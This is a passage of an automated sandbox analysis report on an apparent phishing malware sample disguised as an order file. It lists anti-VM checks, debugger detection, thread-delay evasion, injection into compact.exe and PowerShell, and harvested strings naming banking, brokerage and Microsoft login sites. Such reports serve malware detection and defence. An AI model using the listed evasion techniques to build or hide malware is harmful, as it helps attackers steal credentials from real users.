            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: spec 4008670601 AZTEK Order.exe PID: 1008, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeMemory allocated: B90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeMemory allocated: 2860000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeMemory allocated: 4860000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeMemory allocated: 7810000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeMemory allocated: 8810000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeMemory allocated: 89C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeMemory allocated: 99C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeMemory allocated: 9D20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeMemory allocated: AD20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeMemory allocated: BD20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeMemory allocated: D1D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeMemory allocated: E1D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeMemory allocated: F1D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeMemory allocated: F890000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E096E rdtsc 6_2_017E096E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6637Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1546Jump to behavior
            Source: C:\Windows\SysWOW64\compact.exeWindow / User API: threadDelayed 9805Jump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\compact.exeAPI coverage: 2.7 %
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe TID: 4148Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4780Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2436Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\compact.exe TID: 4776Thread sleep count: 168 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\compact.exe TID: 4776Thread sleep time: -336000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\compact.exe TID: 4776Thread sleep count: 9805 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\compact.exe TID: 4776Thread sleep time: -19610000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe TID: 2708Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe TID: 2708Thread sleep time: -52500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe TID: 2708Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\compact.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DDC170 FindFirstFileW,FindNextFileW,FindClose,12_2_02DDC170
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: compact.exe, 0000000C.00000002.4556356627.000000000310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq'V
            Source: N77o9w1836.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: N77o9w1836.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: N77o9w1836.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: N77o9w1836.12.drBinary or memory string: discord.comVMware20,11696487552f
            Source: N77o9w1836.12.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: N77o9w1836.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: N77o9w1836.12.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: N77o9w1836.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: N77o9w1836.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: N77o9w1836.12.drBinary or memory string: global block list test formVMware20,11696487552
            Source: N77o9w1836.12.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: N77o9w1836.12.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: OFEkXEMCZC.exe, 0000000E.00000002.4561520155.0000000000D8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
            Source: firefox.exe, 0000000F.00000002.2820631900.0000016826ABC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: N77o9w1836.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2130973517.0000000006DC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\#
            Source: N77o9w1836.12.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: N77o9w1836.12.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: N77o9w1836.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: N77o9w1836.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: N77o9w1836.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: N77o9w1836.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: N77o9w1836.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: N77o9w1836.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: N77o9w1836.12.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: N77o9w1836.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: N77o9w1836.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: N77o9w1836.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: N77o9w1836.12.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: N77o9w1836.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: N77o9w1836.12.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: N77o9w1836.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: N77o9w1836.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: N77o9w1836.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E096E rdtsc 6_2_017E096E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_00417B13 LdrLoadDll,6_2_00417B13
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01844180 mov eax, dword ptr fs:[00000030h]6_2_01844180
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01844180 mov eax, dword ptr fs:[00000030h]6_2_01844180
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0185C188 mov eax, dword ptr fs:[00000030h]6_2_0185C188
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0185C188 mov eax, dword ptr fs:[00000030h]6_2_0185C188
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182019F mov eax, dword ptr fs:[00000030h]6_2_0182019F
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182019F mov eax, dword ptr fs:[00000030h]6_2_0182019F
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182019F mov eax, dword ptr fs:[00000030h]6_2_0182019F
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182019F mov eax, dword ptr fs:[00000030h]6_2_0182019F
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A6154 mov eax, dword ptr fs:[00000030h]6_2_017A6154
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A6154 mov eax, dword ptr fs:[00000030h]6_2_017A6154
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179C156 mov eax, dword ptr fs:[00000030h]6_2_0179C156
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018661C3 mov eax, dword ptr fs:[00000030h]6_2_018661C3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018661C3 mov eax, dword ptr fs:[00000030h]6_2_018661C3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E1D0 mov eax, dword ptr fs:[00000030h]6_2_0181E1D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E1D0 mov eax, dword ptr fs:[00000030h]6_2_0181E1D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E1D0 mov ecx, dword ptr fs:[00000030h]6_2_0181E1D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E1D0 mov eax, dword ptr fs:[00000030h]6_2_0181E1D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E1D0 mov eax, dword ptr fs:[00000030h]6_2_0181E1D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D0124 mov eax, dword ptr fs:[00000030h]6_2_017D0124
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018761E5 mov eax, dword ptr fs:[00000030h]6_2_018761E5
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D01F8 mov eax, dword ptr fs:[00000030h]6_2_017D01F8
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184E10E mov eax, dword ptr fs:[00000030h]6_2_0184E10E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184E10E mov ecx, dword ptr fs:[00000030h]6_2_0184E10E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184E10E mov eax, dword ptr fs:[00000030h]6_2_0184E10E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184E10E mov eax, dword ptr fs:[00000030h]6_2_0184E10E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184E10E mov ecx, dword ptr fs:[00000030h]6_2_0184E10E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184E10E mov eax, dword ptr fs:[00000030h]6_2_0184E10E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184E10E mov eax, dword ptr fs:[00000030h]6_2_0184E10E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184E10E mov ecx, dword ptr fs:[00000030h]6_2_0184E10E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184E10E mov eax, dword ptr fs:[00000030h]6_2_0184E10E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184E10E mov ecx, dword ptr fs:[00000030h]6_2_0184E10E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01860115 mov eax, dword ptr fs:[00000030h]6_2_01860115
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184A118 mov ecx, dword ptr fs:[00000030h]6_2_0184A118
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184A118 mov eax, dword ptr fs:[00000030h]6_2_0184A118
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184A118 mov eax, dword ptr fs:[00000030h]6_2_0184A118
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184A118 mov eax, dword ptr fs:[00000030h]6_2_0184A118
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01834144 mov eax, dword ptr fs:[00000030h]6_2_01834144
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01834144 mov eax, dword ptr fs:[00000030h]6_2_01834144
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01834144 mov ecx, dword ptr fs:[00000030h]6_2_01834144
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01834144 mov eax, dword ptr fs:[00000030h]6_2_01834144
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01834144 mov eax, dword ptr fs:[00000030h]6_2_01834144
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01838158 mov eax, dword ptr fs:[00000030h]6_2_01838158
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179A197 mov eax, dword ptr fs:[00000030h]6_2_0179A197
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179A197 mov eax, dword ptr fs:[00000030h]6_2_0179A197
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179A197 mov eax, dword ptr fs:[00000030h]6_2_0179A197
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E0185 mov eax, dword ptr fs:[00000030h]6_2_017E0185
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CC073 mov eax, dword ptr fs:[00000030h]6_2_017CC073
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A2050 mov eax, dword ptr fs:[00000030h]6_2_017A2050
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018380A8 mov eax, dword ptr fs:[00000030h]6_2_018380A8
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018660B8 mov eax, dword ptr fs:[00000030h]6_2_018660B8
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018660B8 mov ecx, dword ptr fs:[00000030h]6_2_018660B8
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179A020 mov eax, dword ptr fs:[00000030h]6_2_0179A020
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179C020 mov eax, dword ptr fs:[00000030h]6_2_0179C020
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018220DE mov eax, dword ptr fs:[00000030h]6_2_018220DE
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018260E0 mov eax, dword ptr fs:[00000030h]6_2_018260E0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BE016 mov eax, dword ptr fs:[00000030h]6_2_017BE016
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BE016 mov eax, dword ptr fs:[00000030h]6_2_017BE016
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BE016 mov eax, dword ptr fs:[00000030h]6_2_017BE016
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BE016 mov eax, dword ptr fs:[00000030h]6_2_017BE016
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01824000 mov ecx, dword ptr fs:[00000030h]6_2_01824000
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01842000 mov eax, dword ptr fs:[00000030h]6_2_01842000
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01842000 mov eax, dword ptr fs:[00000030h]6_2_01842000
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01842000 mov eax, dword ptr fs:[00000030h]6_2_01842000
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01842000 mov eax, dword ptr fs:[00000030h]6_2_01842000
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01842000 mov eax, dword ptr fs:[00000030h]6_2_01842000
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01842000 mov eax, dword ptr fs:[00000030h]6_2_01842000
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01842000 mov eax, dword ptr fs:[00000030h]6_2_01842000
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01842000 mov eax, dword ptr fs:[00000030h]6_2_01842000
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179C0F0 mov eax, dword ptr fs:[00000030h]6_2_0179C0F0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E20F0 mov ecx, dword ptr fs:[00000030h]6_2_017E20F0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A80E9 mov eax, dword ptr fs:[00000030h]6_2_017A80E9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179A0E3 mov ecx, dword ptr fs:[00000030h]6_2_0179A0E3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01836030 mov eax, dword ptr fs:[00000030h]6_2_01836030
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01826050 mov eax, dword ptr fs:[00000030h]6_2_01826050
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A208A mov eax, dword ptr fs:[00000030h]6_2_017A208A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018263C0 mov eax, dword ptr fs:[00000030h]6_2_018263C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0185C3CD mov eax, dword ptr fs:[00000030h]6_2_0185C3CD
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018443D4 mov eax, dword ptr fs:[00000030h]6_2_018443D4
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018443D4 mov eax, dword ptr fs:[00000030h]6_2_018443D4
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184E3DB mov eax, dword ptr fs:[00000030h]6_2_0184E3DB
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184E3DB mov eax, dword ptr fs:[00000030h]6_2_0184E3DB
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184E3DB mov ecx, dword ptr fs:[00000030h]6_2_0184E3DB
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184E3DB mov eax, dword ptr fs:[00000030h]6_2_0184E3DB
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179C310 mov ecx, dword ptr fs:[00000030h]6_2_0179C310
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C0310 mov ecx, dword ptr fs:[00000030h]6_2_017C0310
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DA30B mov eax, dword ptr fs:[00000030h]6_2_017DA30B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DA30B mov eax, dword ptr fs:[00000030h]6_2_017DA30B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DA30B mov eax, dword ptr fs:[00000030h]6_2_017DA30B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D63FF mov eax, dword ptr fs:[00000030h]6_2_017D63FF
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BE3F0 mov eax, dword ptr fs:[00000030h]6_2_017BE3F0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BE3F0 mov eax, dword ptr fs:[00000030h]6_2_017BE3F0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BE3F0 mov eax, dword ptr fs:[00000030h]6_2_017BE3F0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B03E9 mov eax, dword ptr fs:[00000030h]6_2_017B03E9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B03E9 mov eax, dword ptr fs:[00000030h]6_2_017B03E9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B03E9 mov eax, dword ptr fs:[00000030h]6_2_017B03E9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B03E9 mov eax, dword ptr fs:[00000030h]6_2_017B03E9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B03E9 mov eax, dword ptr fs:[00000030h]6_2_017B03E9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B03E9 mov eax, dword ptr fs:[00000030h]6_2_017B03E9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B03E9 mov eax, dword ptr fs:[00000030h]6_2_017B03E9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B03E9 mov eax, dword ptr fs:[00000030h]6_2_017B03E9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA3C0 mov eax, dword ptr fs:[00000030h]6_2_017AA3C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA3C0 mov eax, dword ptr fs:[00000030h]6_2_017AA3C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA3C0 mov eax, dword ptr fs:[00000030h]6_2_017AA3C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA3C0 mov eax, dword ptr fs:[00000030h]6_2_017AA3C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA3C0 mov eax, dword ptr fs:[00000030h]6_2_017AA3C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA3C0 mov eax, dword ptr fs:[00000030h]6_2_017AA3C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A83C0 mov eax, dword ptr fs:[00000030h]6_2_017A83C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A83C0 mov eax, dword ptr fs:[00000030h]6_2_017A83C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A83C0 mov eax, dword ptr fs:[00000030h]6_2_017A83C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A83C0 mov eax, dword ptr fs:[00000030h]6_2_017A83C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01822349 mov eax, dword ptr fs:[00000030h]6_2_01822349
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01822349 mov eax, dword ptr fs:[00000030h]6_2_01822349
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01822349 mov eax, dword ptr fs:[00000030h]6_2_01822349
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01822349 mov eax, dword ptr fs:[00000030h]6_2_01822349
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01822349 mov eax, dword ptr fs:[00000030h]6_2_01822349
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01822349 mov eax, dword ptr fs:[00000030h]6_2_01822349
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01822349 mov eax, dword ptr fs:[00000030h]6_2_01822349
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01822349 mov eax, dword ptr fs:[00000030h]6_2_01822349
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01822349 mov eax, dword ptr fs:[00000030h]6_2_01822349
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01822349 mov eax, dword ptr fs:[00000030h]6_2_01822349
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01822349 mov eax, dword ptr fs:[00000030h]6_2_01822349
